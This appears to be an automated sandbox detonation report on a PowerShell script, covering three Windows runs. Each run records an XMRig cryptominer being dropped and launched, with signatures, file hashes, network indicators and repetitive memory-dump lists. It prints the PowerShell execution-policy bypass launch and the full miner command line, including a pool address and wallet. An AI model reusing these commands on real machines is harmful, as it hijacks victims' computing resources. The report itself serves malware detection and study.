memory/2576-153-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-154-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-155-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 4312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 4312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4988-5-0x000002B06B740000-0x000002B06B762000-memory.dmp
memory/4988-8-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-9-0x000002B06BA50000-0x000002B06BAC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br0sl1es.wfz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-48-0x000002B06BA10000-0x000002B06BA22000-memory.dmp
memory/4988-61-0x000002B06B790000-0x000002B06B79A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4312-90-0x0000015E4BB30000-0x0000015E4BB50000-memory.dmp
memory/4312-91-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4988-92-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4312-93-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-96-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4312-97-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-98-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-99-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-100-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-101-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-102-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-103-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-104-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-105-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-106-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-107-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-108-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-109-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-110-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-111-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-112-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-113-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-114-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-115-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-116-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-117-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-118-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-119-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-120-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-121-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-122-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-123-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-124-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-125-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-126-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-127-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-128-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-129-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-130-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-131-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-132-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-133-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-134-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-135-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-136-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-137-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-138-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-139-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-140-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-141-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-142-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-143-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-144-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-145-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-146-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-147-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-148-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-149-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-150-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-151-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-152-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-153-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-154-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-155-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-156-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-157-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:18
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1092 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1092 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1092-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idbeawvs.yes.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1092-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-9-0x0000029DB58E0000-0x0000029DB5902000-memory.dmp
memory/1092-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-14-0x0000029DCDF40000-0x0000029DCDF52000-memory.dmp
memory/1092-15-0x0000029DCDF20000-0x0000029DCDF2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3052-46-0x0000021522F10000-0x0000021522F30000-memory.dmp
memory/3052-47-0x0000021522F70000-0x0000021522F90000-memory.dmp
memory/1092-49-0x00007FFA49283000-0x00007FFA49285000-memory.dmp
memory/1092-50-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/3052-48-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-53-0x00000215B7400000-0x00000215B7420000-memory.dmp
memory/3052-52-0x0000021522F90000-0x0000021522FB0000-memory.dmp
memory/3052-51-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/1092-54-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/3052-55-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-56-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-58-0x00000215B7400000-0x00000215B7420000-memory.dmp
memory/3052-57-0x0000021522F90000-0x0000021522FB0000-memory.dmp
memory/3052-59-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-60-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-61-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-62-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-63-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-64-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-65-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-66-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-67-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-68-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-69-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-70-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-71-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-72-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-73-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-74-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-75-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-76-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-77-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-78-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-79-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-80-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-81-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-82-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-83-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-84-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-85-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-86-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-87-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-88-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-89-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-90-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-91-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-92-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-93-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-94-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-95-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-96-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-97-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-98-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-99-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-100-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-101-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-102-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-103-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-104-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-105-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-106-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-107-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-108-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-109-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-110-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-111-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-112-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-113-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-114-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-115-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-116-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-117-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:26
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1755s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2656 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
